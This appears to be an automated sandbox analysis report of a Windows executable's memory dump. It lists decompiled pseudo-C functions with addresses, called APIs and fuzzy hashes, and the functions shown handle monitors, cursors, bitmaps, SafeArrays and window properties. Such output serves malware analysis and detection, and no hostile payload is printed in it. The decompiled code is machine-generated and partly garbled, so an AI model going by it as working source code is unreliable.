Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: D61680$D61710D62140
String ID: VmC
API String ID: 1125970620-2834730704
Opcode ID: eb8903c91f2bf74edd23b699f653a96b3fe11d835ff7514aa1398303b9329f4e
Instruction ID: 9953ed128cad8feb0f3ae23d12cf6c5aaa35a128a7d55d8bda8166df7b972544
Opcode Fuzzy Hash: eb8903c91f2bf74edd23b699f653a96b3fe11d835ff7514aa1398303b9329f4e
Instruction Fuzzy Hash: E1216075B40204EFEB10EBA9DC82F6D73F8EB49B04F5104A5F900DB291DA75AD50DB58

Uniqueness

Uniqueness Score: -1.00%

Function 00426DA8, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 68
stringCOMMON

Download Yara Rule

C-Code - Quality: 47%

			E00426DA8(intOrPtr _a4, intOrPtr* _a8) {
				void _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t23;
				int _t24;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t29;
				intOrPtr* _t31;

				_t29 = _a8;
				_t27 = _a4;
				if( *0x48fac1 != 0) {
					_t24 = 0;
					if(_t27 == 0x12340042 && _t29 != 0 &&  *_t29 >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
						 *((intOrPtr*)(_t29 + 4)) = 0;
						 *((intOrPtr*)(_t29 + 8)) = 0;
						 *((intOrPtr*)(_t29 + 0xc)) = GetSystemMetrics(0);
						 *((intOrPtr*)(_t29 + 0x10)) = GetSystemMetrics(1);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t31 = _t29;
						 *(_t31 + 0x24) = 1;
						if( *_t31 >= 0x4c) {
							_push("DISPLAY");
							_push(_t31 + 0x28);
							L00406A30();
						}
						_t24 = 1;
					}
				} else {
					_t26 =  *0x48faa8; // 0x426da8
					 *0x48faa8 = E004269A4(5, _t23, _t26, _t27, _t29);
					_t24 =  *0x48faa8(_t27, _t29);
				}
				return _t24;
			}

0x00426db1
0x00426db4
0x00426dbe
0x00426de3
0x00426deb
0x00426e0b
0x00426e10
0x00426e1b
0x00426e26
0x00426e30
0x00426e31
0x00426e32
0x00426e33
0x00426e34
0x00426e35
0x00426e3f
0x00426e41
0x00426e49
0x00426e4a
0x00426e4a
0x00426e4f
0x00426e4f
0x00426dc0
0x00426dc5
0x00426dd2
0x00426ddf
0x00426ddf
0x00426e59

APIs

SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00426E00
GetSystemMetrics.USER32 ref: 00426E15
GetSystemMetrics.USER32 ref: 00426E20
lstrcpy.KERNEL32(?,DISPLAY), ref: 00426E4A

Part of subcall function 004269A4: GetProcAddress.KERNEL32(74EA0000,00000000), ref: 00426A24

Strings

GetMonitorInfoA, xrefs: 00426DC0
DISPLAY, xrefs: 00426E41

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: System$Metrics$AddressInfoParametersProclstrcpy
String ID: DISPLAY$GetMonitorInfoA
API String ID: 2545840971-1370492664
Opcode ID: f900c35ae3dc6205bd407d6816b77bff7fe57f22696ddf71ae9018093f2ad49e
Instruction ID: f8cde7d44004624ee2a9f4519e191afe13ff0c7a16453b1947641015e797f9db
Opcode Fuzzy Hash: f900c35ae3dc6205bd407d6816b77bff7fe57f22696ddf71ae9018093f2ad49e
Instruction Fuzzy Hash: 4011D2357003209FD720CF60EC447ABB7A9EB45B20F52493EED4997640D774A848C799

Uniqueness

Uniqueness Score: -1.00%

Function 00423744, Relevance: 10.6, APIs: 7, Instructions: 66
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E00423744(int __eax, void* __ecx, intOrPtr __edx) {
				intOrPtr _v8;
				int _v12;
				struct HDC__* _v16;
				void* _v20;
				struct tagRGBQUAD _v1044;
				int _t16;
				struct HDC__* _t18;
				int _t31;
				int _t34;
				intOrPtr _t41;
				void* _t43;
				void* _t46;
				void* _t48;
				intOrPtr _t49;

				_t16 = __eax;
				_t46 = _t48;
				_t49 = _t48 + 0xfffffbf0;
				_v8 = __edx;
				_t43 = __eax;
				if(__eax == 0 ||  *((short*)(__ecx + 0x26)) > 8) {
					L4:
					return _t16;
				} else {
					_t16 = E00420DD0(_v8, 0xff,  &_v1044);
					_t34 = _t16;
					if(_t34 == 0) {
						goto L4;
					} else {
						_push(0);
						L00406E30();
						_v12 = _t16;
						_t18 = _v12;
						_push(_t18);
						L00406A60();
						_v16 = _t18;
						_v20 = SelectObject(_v16, _t43);
						_push(_t46);
						_push(0x4237f3);
						_push( *[fs:eax]);
						 *[fs:eax] = _t49;
						SetDIBColorTable(_v16, 0, _t34,  &_v1044);
						_pop(_t41);
						 *[fs:eax] = _t41;
						_push(0x4237fa);
						SelectObject(_v16, _v20);
						DeleteDC(_v16);
						_t31 = _v12;
						_push(_t31);
						_push(0);
						L00407090();
						return _t31;
					}
				}
			}

0x00423744
0x00423745
0x00423747
0x0042374f
0x00423752
0x00423756
0x004237fa
0x004237ff
0x00423767
0x00423775
0x0042377a
0x0042377e
0x00000000
0x00423780
0x00423780
0x00423782
0x00423787
0x0042378a
0x0042378d
0x0042378e
0x00423793
0x004237a0
0x004237a5
0x004237a6
0x004237ab
0x004237ae
0x004237bf
0x004237c6
0x004237c9
0x004237cc
0x004237d9
0x004237e2
0x004237e7
0x004237ea
0x004237eb
0x004237ed
0x004237f2
0x004237f2
0x0042377e

APIs

Part of subcall function 00420DD0: GetObjectA.GDI32(00000000,00000004), ref: 00420DE7
Part of subcall function 00420DD0: 7378AEA0.GDI32(00000000,00000000,?,00000028,00000000,00000004,?,000000FF,00000000,00000018,00000000,00423A4E,00000000,00423BA4,?,00000000), ref: 00420E0A

7378AC50.USER32(00000000), ref: 00423782
7378A590.GDI32(?,00000000), ref: 0042378E
SelectObject.GDI32(?), ref: 0042379B
SetDIBColorTable.GDI32(?,00000000,00000000,?,00000000,004237F3,?,?,?,?,00000000), ref: 004237BF
SelectObject.GDI32(?,?), ref: 004237D9
DeleteDC.GDI32(?), ref: 004237E2
7378B380.USER32(00000000,?,?,?,?,004237FA,?,00000000,004237F3,?,?,?,?,00000000), ref: 004237ED

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: 7378$Object$Select$A590B380ColorDeleteTable
String ID:
API String ID: 1557749399-0
Opcode ID: 87f96016a7a646f630481e6696d2d5353e40e77120ca7cdba65db843f4ef4c70
Instruction ID: b287b78f8c2a47c6c3545cd447f796bbb0f573e48773bc7eb7c4b6b30d5c8d90
Opcode Fuzzy Hash: 87f96016a7a646f630481e6696d2d5353e40e77120ca7cdba65db843f4ef4c70
Instruction Fuzzy Hash: AD1187F1E002296BDB00EFE9DC52AAEB3BCEB48304F418476B505E7291D6BC9E504B54

Uniqueness

Uniqueness Score: -1.00%

Function 00456D40, Relevance: 10.6, APIs: 7, Instructions: 57
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00456D40(long __eax, void* __ecx, short __edx) {
				struct tagPOINT _v24;
				long _t7;
				long _t12;
				long _t19;
				void* _t21;
				struct HWND__* _t27;
				short _t28;
				void* _t30;
				struct tagPOINT* _t31;

				_t21 = __ecx;
				_t7 = __eax;
				_t31 = _t30 + 0xfffffff8;
				_t28 = __edx;
				_t19 = __eax;
				if(__edx ==  *((intOrPtr*)(__eax + 0x44))) {
					L6:
					 *((intOrPtr*)(_t19 + 0x48)) =  *((intOrPtr*)(_t19 + 0x48)) + 1;
				} else {
					 *((short*)(__eax + 0x44)) = __edx;
					if(__edx != 0) {
						L5:
						_t7 = SetCursor(E00456D18(_t19, _t28));
						goto L6;
					} else {
						GetCursorPos(_t31);
						_push(_v24.y);
						_t27 = WindowFromPoint(_v24);
						if(_t27 == 0) {
							goto L5;
						} else {
							_t12 = GetWindowThreadProcessId(_t27, 0);
							if(_t12 != GetCurrentThreadId()) {
								goto L5;
							} else {
								_t7 = SendMessageA(_t27, 0x20, _t27, E004071F0(SendMessageA(_t27, 0x84, 0, E00407274(_t31, _t21)), 0x200));
							}
						}
					}
				}
				return _t7;
			}

0x00456d40
0x00456d40
0x00456d44
0x00456d47
0x00456d49
0x00456d4f
0x00456dc4
0x00456dc4
0x00456d51
0x00456d51
0x00456d58
0x00456db4
0x00456dbf
0x00000000
0x00456d5a
0x00456d5b
0x00456d60
0x00456d6d
0x00456d71
0x00000000
0x00456d73
0x00456d76
0x00456d84
0x00000000
0x00456d86
0x00456dad
0x00456dad
0x00456d84
0x00456d71
0x00456d58
0x00456dcd

APIs

GetCursorPos.USER32 ref: 00456D5B
WindowFromPoint.USER32(?,?), ref: 00456D68
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00456D76
GetCurrentThreadId.KERNEL32 ref: 00456D7D
SendMessageA.USER32 ref: 00456D96
SendMessageA.USER32 ref: 00456DAD
SetCursor.USER32(00000000), ref: 00456DBF

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
String ID:
API String ID: 1770779139-0
Opcode ID: 306cdf2b890e1182cba67fe1a6e39cdbbecb4d3fba69456f6993d8c24ab47364
Instruction ID: ac3e4da1ce0524eed089a6cf3934fddf4ca9b81ecae305a6cab7641aa384b303
Opcode Fuzzy Hash: 306cdf2b890e1182cba67fe1a6e39cdbbecb4d3fba69456f6993d8c24ab47364
Instruction Fuzzy Hash: 6801D42230520165DA2077368C82F7F2578DF81B59F510A3FBA04BB2C7E93D9C08926E

Uniqueness

Uniqueness Score: -1.00%

Function 0040C3D0, Relevance: 9.1, APIs: 6, Instructions: 139
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E0040C3D0(short* __eax, intOrPtr __ecx, intOrPtr* __edx) {
				char _v260;
				char _v768;
				char _v772;
				short* _v776;
				intOrPtr _v780;
				char _v784;
				signed int _v788;
				signed short* _v792;
				char _v796;
				char _v800;
				intOrPtr* _v804;
				void* __ebp;
				signed char _t44;
				signed int _t49;
				signed short* _t56;
				char* _t58;
				void* _t64;
				intOrPtr* _t69;
				signed short* _t76;
				signed short* _t79;
				intOrPtr _t88;
				void* _t90;
				void* _t92;
				void* _t93;
				void* _t94;
				intOrPtr* _t102;
				void* _t106;
				intOrPtr _t107;
				char* _t108;
				void* _t109;

				_v780 = __ecx;
				_v776 = __eax;
				_t44 =  *((intOrPtr*)(__edx));
				_t97 = _t44 & 0x00000fff;
				if((_t44 & 0x00000fff) != 0xc) {
					_push(__edx);
					_t88 = _v776;
					_push(_t88);
					L0040C0CC();
					return _t88;
				}
				if((_t44 & 0x00000040) == 0) {
					_v792 =  *((intOrPtr*)(__edx + 8));
				} else {
					_v792 =  *((intOrPtr*)( *((intOrPtr*)(__edx + 8))));
				}
				_v788 =  *_v792 & 0x0000ffff;
				_t90 = _v788 - 1;
				if(_t90 >= 0) {
					_t94 = _t90 + 1;
					_t106 = 0;
					_t108 =  &_v772;
					do {
						_v804 = _t108;
						_push(_v804 + 4);
						_t16 = _t106 + 1; // 0x1
						_t76 = _v792;
						_push(_t76);
						L0040C0F4();
						if(_t76 != 0) {
							E00402888(0x14);
						}
						_push( &_v784);
						_t19 = _t106 + 1; // 0x1
						_t79 = _v792;
						_push(_t79);
						L0040C0FC();
						if(_t79 != 0) {
							E00402888(0x14);
						}
						 *_v804 = _v784 -  *((intOrPtr*)(_v804 + 4)) + 1;
						_t106 = _t106 + 1;
						_t108 = _t108 + 8;
						_t94 = _t94 - 1;
					} while (_t94 != 0);
				}
				_push( &_v772);
				_t49 = _v788;
				_push(_t49);
				_push(0xc);
				L0040C0E4();
				_t107 = _t49;
				if(_t107 == 0) {
					E00402888(0x12);
				}
				E0040C290(_v776, _t97);
				 *_v776 = 0x200c;
				 *((intOrPtr*)(_v776 + 8)) = _t107;
				_t92 = _v788 - 1;
				if(_t92 >= 0) {
					_t93 = _t92 + 1;
					_t69 =  &_v768;
					_t102 =  &_v260;
					do {
						 *_t102 =  *_t69;
						_t102 = _t102 + 4;
						_t69 = _t69 + 8;
						_t93 = _t93 - 1;
					} while (_t93 != 0);
					do {
						goto L17;
					} while (_t64 != 0);
					return _t64;
				}
				L17:
				_push( &_v796);
				_push( &_v260);
				_t56 = _v792;
				_push(_t56);
				L0040C114();
				if(_t56 != 0) {
					E00402888(0x14);
				}
				_push( &_v800);
				_t58 =  &_v260;
				_push(_t58);
				_push(_t107);
				L0040C114();
				if(_t58 != 0) {
					E00402888(0x14);
				}
				_v780();
				_t64 = E0040C374(_v788 - 1, _t109);
			}

0x0040c3dc
0x0040c3e2
0x0040c3e8
0x0040c3ed
0x0040c3f6
0x0040c3f8
0x0040c3f9
0x0040c3ff
0x0040c400
0x00000000
0x0040c400
0x0040c40d
0x0040c41f
0x0040c40f
0x0040c414
0x0040c414
0x0040c42e
0x0040c43a
0x0040c43d
0x0040c43f
0x0040c440
0x0040c442
0x0040c448
0x0040c44a
0x0040c459
0x0040c45a
0x0040c45e
0x0040c464
0x0040c465
0x0040c46c
0x0040c470
0x0040c470
0x0040c47b
0x0040c47c
0x0040c480
0x0040c486
0x0040c487
0x0040c48e
0x0040c492
0x0040c492
0x0040c4ad
0x0040c4af
0x0040c4b0
0x0040c4b3
0x0040c4b3
0x0040c448
0x0040c4bc
0x0040c4bd
0x0040c4c3
0x0040c4c4
0x0040c4c6
0x0040c4cb
0x0040c4cf
0x0040c4d3
0x0040c4d3
0x0040c4de
0x0040c4e9
0x0040c4f4
0x0040c4fd
0x0040c500
0x0040c502
0x0040c503
0x0040c509
0x0040c50f
0x0040c511
0x0040c513
0x0040c516
0x0040c519
0x0040c519
0x0040c51c
0x00000000
0x00000000
0x0040c58c
0x0040c58c
0x0040c51c
0x0040c522
0x0040c529
0x0040c52a
0x0040c530
0x0040c531
0x0040c538
0x0040c53c
0x0040c53c
0x0040c547
0x0040c548
0x0040c54e
0x0040c54f
0x0040c550
0x0040c557
0x0040c55b
0x0040c55b
0x0040c56e
0x0040c57c

APIs

VariantCopy.OLEAUT32(?), ref: 0040C400
SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0040C465
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0040C487
SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0040C4C6
SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0040C531
SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 0040C550

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: ArraySafe$BoundIndex$CopyCreateVariant
String ID:
API String ID: 351091851-0
Opcode ID: bde47607384e88626c11003b3b21496450f61ba110f915f81c0edd029a5ca511
Instruction ID: e3d9d08425be40a8c17ff51e4185aa0981f6c60c5e0398ee72e90e49a0dc38e2
Opcode Fuzzy Hash: bde47607384e88626c11003b3b21496450f61ba110f915f81c0edd029a5ca511
Instruction Fuzzy Hash: 49510F7590112DDBDB25DB59CC91ADAB3BCBF48344F4042E6E909F7282D634AF818F64

Uniqueness

Uniqueness Score: -1.00%

Function 0042107C, Relevance: 9.1, APIs: 6, Instructions: 84
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E0042107C(intOrPtr* __eax, void* __ebx, signed int __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags, int _a4, signed int* _a8) {
				intOrPtr* _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v32;
				signed short _v44;
				int _t36;
				signed int _t37;
				signed short _t38;
				signed int _t39;
				signed short _t43;
				signed int* _t47;
				signed int _t51;
				intOrPtr _t61;
				void* _t67;
				void* _t68;
				void* _t69;
				intOrPtr _t70;

				_t68 = _t69;
				_t70 = _t69 + 0xffffff90;
				_v16 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_t47 = _a8;
				_v24 = _v16 << 4;
				_v20 = E00408334(_v24, __eflags);
				 *[fs:edx] = _t70;
				_t51 = _v24;
				 *((intOrPtr*)( *_v8 + 8))( *[fs:edx], 0x421373, _t68, __edi, __esi, __ebx, _t67);
				if(( *_t47 | _t47[1]) != 0) {
					_t36 = _a4;
					 *_t36 =  *_t47;
					 *(_t36 + 4) = _t47[1];
				} else {
					 *_a4 = GetSystemMetrics(0xb);
					_t36 = GetSystemMetrics(0xc);
					 *(_a4 + 4) = _t36;
				}
				_push(0);
				L00406E30();
				_v44 = _t36;
				if(_v44 == 0) {
					E00420540(_t51);
				}
				_push(_t68);
				_push(0x421165);
				_push( *[fs:edx]);
				 *[fs:edx] = _t70;
				_push(0xe);
				_t37 = _v44;
				_push(_t37);
				L00406B00();
				_push(0xc);
				_t38 = _v44;
				_push(_t38);
				L00406B00();
				_t39 = _t37 * _t38;
				if(_t39 <= 8) {
					__eflags = 1;
					_v32 = 1 << _t39;
				} else {
					_v32 = 0x7fffffff;
				}
				_pop(_t61);
				 *[fs:eax] = _t61;
				_push(E0042116C);
				_t43 = _v44;
				_push(_t43);
				_push(0);
				L00407090();
				return _t43;
			}

0x0042107d
0x0042107f
0x00421085
0x00421088
0x0042108b
0x0042108e
0x00421097
0x004210a2
0x004210b0
0x004210b6
0x004210be
0x004210c6
0x004210e3
0x004210e8
0x004210ed
0x004210c8
0x004210d2
0x004210d6
0x004210de
0x004210de
0x004210f0
0x004210f2
0x004210f7
0x004210fe
0x00421100
0x00421100
0x00421107
0x00421108
0x0042110d
0x00421110
0x00421113
0x00421115
0x00421118
0x00421119
0x00421120
0x00421122
0x00421125
0x00421126
0x0042112f
0x00421135
0x00421147
0x00421149
0x00421137
0x00421137
0x00421137
0x0042114e
0x00421151
0x00421154
0x00421159
0x0042115c
0x0042115d
0x0042115f
0x00421164

APIs

GetSystemMetrics.USER32 ref: 004210CA
GetSystemMetrics.USER32 ref: 004210D6
7378AC50.USER32(00000000), ref: 004210F2
7378AD70.GDI32(00000000,0000000E,00000000,00421165,?,00000000), ref: 00421119
7378AD70.GDI32(00000000,0000000C,00000000,0000000E,00000000,00421165,?,00000000), ref: 00421126
7378B380.USER32(00000000,00000000,0042116C,0000000E,00000000,00421165,?,00000000), ref: 0042115F

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: 7378$MetricsSystem$B380
String ID:
API String ID: 3728303498-0
Opcode ID: b51627bb0a1fa58ccc2dcd3e0166a7d558477a5e981bdc8f0c486c6466243468
Instruction ID: 9308dfa8c1cc9973fabc3a1629e5ff09255cce478b7a861a8919cf7493d277e5
Opcode Fuzzy Hash: b51627bb0a1fa58ccc2dcd3e0166a7d558477a5e981bdc8f0c486c6466243468
Instruction Fuzzy Hash: 7131A274A00214EFEB00DFA5C841BAEBBB5FB49750F50816AF914AB390C638AD41CF68

Uniqueness

Uniqueness Score: -1.00%

Function 004214EC, Relevance: 9.1, APIs: 6, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E004214EC(struct HBITMAP__* __eax, void* __ebx, struct tagBITMAPINFO* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, void* _a8) {
				char _v5;
				struct HDC__* _v12;
				struct HDC__* _v16;
				struct HDC__* _t29;
				struct tagBITMAPINFO* _t32;
				intOrPtr _t39;
				struct HBITMAP__* _t43;
				void* _t46;

				_t32 = __ecx;
				_t43 = __eax;
				E0042139C(__eax, _a4, __ecx);
				_v12 = 0;
				_push(0);
				L00406A60();
				_v16 = 0;
				_push(_t46);
				_push(0x421589);
				_push( *[fs:eax]);
				 *[fs:eax] = _t46 + 0xfffffff4;
				if(__edx != 0) {
					_push(0);
					_push(__edx);
					_t29 = _v16;
					_push(_t29);
					L00406BD8();
					_v12 = _t29;
					_push(_v16);
					L00406BA8();
				}
				_v5 = GetDIBits(_v16, _t43, 0, _t32->bmiHeader.biHeight, _a8, _t32, 0) != 0;
				_pop(_t39);
				 *[fs:eax] = _t39;
				_push(E00421590);
				if(_v12 != 0) {
					_push(0);
					_push(_v12);
					_push(_v16);
					L00406BD8();
				}
				return DeleteDC(_v16);
			}

0x004214f5
0x004214f9
0x00421502
0x00421509
0x0042150c
0x0042150e
0x00421513
0x00421518
0x00421519
0x0042151e
0x00421521
0x00421526
0x00421528
0x0042152a
0x0042152b
0x0042152e
0x0042152f
0x00421534
0x0042153a
0x0042153b
0x0042153b
0x00421559
0x0042155f
0x00421562
0x00421565
0x0042156e
0x00421570
0x00421575
0x00421579
0x0042157a
0x0042157a
0x00421588

APIs

Part of subcall function 0042139C: GetObjectA.GDI32(?,00000054), ref: 004213B0

7378A590.GDI32(00000000), ref: 0042150E
7378B410.GDI32(?,?,00000000,00000000,00421589,?,00000000), ref: 0042152F
7378B150.GDI32(?,?,?,00000000,00000000,00421589,?,00000000), ref: 0042153B
GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 00421552
7378B410.GDI32(?,00000000,00000000,00421590,00000000,?,?,?,00000000,00000000,00421589,?,00000000), ref: 0042157A
DeleteDC.GDI32(?), ref: 00421583

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: 7378$B410$A590B150BitsDeleteObject
String ID:
API String ID: 3290156324-0
Opcode ID: c7ffae817a4fb1e2d886e0142128761c2e9997eef040b974f49ef668718abe20
Instruction ID: 4c2f870a7c7292c98b5d899b0d77512a1fdb18d44c758e7c42c4dba3647218b1
Opcode Fuzzy Hash: c7ffae817a4fb1e2d886e0142128761c2e9997eef040b974f49ef668718abe20
Instruction Fuzzy Hash: E5118F75B002187FDB10DBA9CC41F9EB7FCEF49710F5184AAB515F7290D678A9408B68

Uniqueness

Uniqueness Score: -1.00%

Function 00435AE8, Relevance: 9.1, APIs: 6, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00435AE8(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				void* _t20;
				void* _t21;
				void* _t27;
				void* _t31;
				void* _t35;
				intOrPtr* _t43;

				_t43 =  &_v8;
				_t20 =  *0x4718d0; // 0x0
				 *((intOrPtr*)(_t20 + 0x180)) = _a4;
				_t21 =  *0x4718d0; // 0x0
				SetWindowLongA(_a4, 0xfffffffc,  *(_t21 + 0x18c));
				if((GetWindowLongA(_a4, 0xfffffff0) & 0x40000000) != 0 && GetWindowLongA(_a4, 0xfffffff4) == 0) {
					SetWindowLongA(_a4, 0xfffffff4, _a4);
				}
				_t27 =  *0x4718d0; // 0x0
				SetPropA(_a4,  *0x48fb72 & 0x0000ffff, _t27);
				_t31 =  *0x4718d0; // 0x0
				SetPropA(_a4,  *0x48fb70 & 0x0000ffff, _t31);
				_t35 =  *0x4718d0; // 0x0
				 *0x4718d0 = 0;
				_v8 =  *((intOrPtr*)(_t35 + 0x18c))(_a4, _a8, _a12, _a16);
				return  *_t43;
			}

0x00435aed
0x00435af0
0x00435af8
0x00435afe
0x00435b10
0x00435b25
0x00435b40
0x00435b40
0x00435b45
0x00435b57
0x00435b5c
0x00435b6e
0x00435b7f
0x00435b84
0x00435b94
0x00435b9c

APIs

SetWindowLongA.USER32 ref: 00435B10
GetWindowLongA.USER32 ref: 00435B1B
GetWindowLongA.USER32 ref: 00435B2D
SetWindowLongA.USER32 ref: 00435B40
SetPropA.USER32(?,00000000,00000000), ref: 00435B57
SetPropA.USER32(?,00000000,00000000), ref: 00435B6E

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: LongWindow$Prop
String ID:
API String ID: 3887896539-0
Opcode ID: dceccd7d6609d573a3fd3a61f4eb2a58691cefffe421801bf144bb0a17a05d58
Instruction ID: c4f939e434027b5a8ad6da9d02073f8f4a3cf72295f121b3f7a6c4c28ba548e6
Opcode Fuzzy Hash: dceccd7d6609d573a3fd3a61f4eb2a58691cefffe421801bf144bb0a17a05d58
Instruction Fuzzy Hash: FF11DD75504244BFCB00EF9DDC85D9A37E8BB0C394F118625F968DB2E1D738E9409B65

Uniqueness

Uniqueness Score: -1.00%

Function 00420D2C, Relevance: 9.1, APIs: 6, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E00420D2C(struct HDC__* __eax, signed int __ecx) {
				char _v1036;
				signed int _v1038;
				struct tagRGBQUAD _v1048;
				short _v1066;
				short* _t15;
				void* _t18;
				struct HDC__* _t23;
				void* _t26;
				short* _t31;
				short* _t32;

				_t31 = 0;
				 *_t32 = 0x300;
				if(__eax == 0) {
					_v1038 = __ecx;
					E00402994(_t26, __ecx << 2,  &_v1036);
				} else {
					_push(0);
					L00406A60();
					_t23 = __eax;
					_t18 = SelectObject(__eax, __eax);
					_v1066 = GetDIBColorTable(_t23, 0, 0x100,  &_v1048);
					SelectObject(_t23, _t18);
					DeleteDC(_t23);
				}
				if(_v1038 != 0) {
					if(_v1038 != 0x10 || E00420C94(_t32) == 0) {
						E00420B24( &_v1036, _v1038 & 0x0000ffff);
					}
					_t15 = _t32;
					_push(_t15);
					L00406A88();
					_t31 = _t15;
				}
				return _t31;
			}

0x00420d37
0x00420d39
0x00420d41
0x00420d7b
0x00420d89
0x00420d43
0x00420d43
0x00420d45
0x00420d4a
0x00420d4e
0x00420d67
0x00420d6e
0x00420d74
0x00420d74
0x00420d94
0x00420d9c
0x00420db2
0x00420db2
0x00420db7
0x00420db9
0x00420dba
0x00420dbf
0x00420dbf
0x00420dcc

APIs

7378A590.GDI32(00000000,00000000,?,?,00424AD3,?,?,?,?,004235DF,00000000,0042366B), ref: 00420D45
SelectObject.GDI32(00000000,00000000), ref: 00420D4E
GetDIBColorTable.GDI32(00000000,00000000,00000100,?,00000000,00000000,00000000,00000000,?,?,00424AD3,?,?,?,?,004235DF), ref: 00420D62
SelectObject.GDI32(00000000,00000000), ref: 00420D6E
DeleteDC.GDI32(00000000), ref: 00420D74
7378A8F0.GDI32(?,00000000,?,?,00424AD3,?,?,?,?,004235DF,00000000,0042366B), ref: 00420DBA

Memory Dump Source

